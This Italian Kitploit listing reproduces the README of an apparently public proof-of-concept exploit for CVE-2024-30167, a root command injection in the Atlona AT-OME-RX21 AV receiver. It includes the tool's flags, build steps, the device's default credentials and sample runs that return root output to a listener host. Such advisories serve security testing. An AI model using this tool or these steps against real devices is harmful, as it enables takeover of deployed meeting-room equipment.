Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-30167 — Exploit proof-of-concept per l'iniezione di comandi autenticata in Atlona AT-OME-RX21, che consente l'esecuzione di comandi a livello root tramite l'interfaccia di configurazione dell'ora. | Kitploit
Strumenti/GitHubGitHub/rizzziom/cve-2024-30167
Sicurezza Sistemi EmbeddedAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubrizzziom/cve-2024-30167

CVE-2024-30167

Exploit proof-of-concept per l'iniezione di comandi autenticata in Atlona AT-OME-RX21, che consente l'esecuzione di comandi a livello root tramite l'interfaccia di configurazione dell'ora.

Vedi Repository
128 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC per Iniezione di Comandi Autenticata su Atlona OME

Disclaimer: Questo proof of concept è fornito esclusivamente per scopi educativi e di ricerca. Non utilizzare questo codice su sistemi di cui non possiedi o non hai esplicita autorizzazione per testare. Non sono responsabile per qualsiasi uso improprio.

Una vulnerabilità di iniezione di comandi autenticata è presente nell'interfaccia di configurazione dell'ora dello switch AV Atlona AT-OME-RX21. Un utente con credenziali valide può iniettare comandi del sistema operativo che vengono eseguiti come root, portando a un compromesso completo del sistema.

Informazioni sul Prodotto

Atlona AT-OME-RX21 è un ricevitore e scaler AV (audio/video) progettato per ambienti professionali di videoconferenza e collaborazione. Viene utilizzato principalmente in sale riunioni, aule e spazi di collaborazione. Aiuta a collegare dispositivi come laptop/sistemi di videoconferenza ai display.

Questo PoC funziona su tutte le versioni firmware <= 1.5.1

info del produttore: https://atlona.com/product/at-ome-rx21/

Utilizzo

root@kitploit:~
$ .\cve-2024-30167.exe -h


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Utilizzo di cve-2024-30167.exe:
  -P string
        porta di ascolto per l'output dei comandi (default "4444")
  -c string
        Comando da eseguire sul target
  -l string
        host di ascolto per l'output dei comandi
  -p string
        Password per l'autenticazione (default "Atlona")
  -t string
        URL del target (es: http://example.com)
  -u string
        Nome utente per l'autenticazione (default "admin")
  1. Crea un binario per il tuo sistema
root@kitploit:~
go build -o <OUTPUT_FILENAME>
  1. Esegui l'exploit contro il dispositivo Atlona target
root@kitploit:~
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
root

$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337    


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)

il comando precedente utilizza le credenziali predefinite per accedere al dispositivo.

SINTASSI:

root@kitploit:~
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>

Scarica lo strumento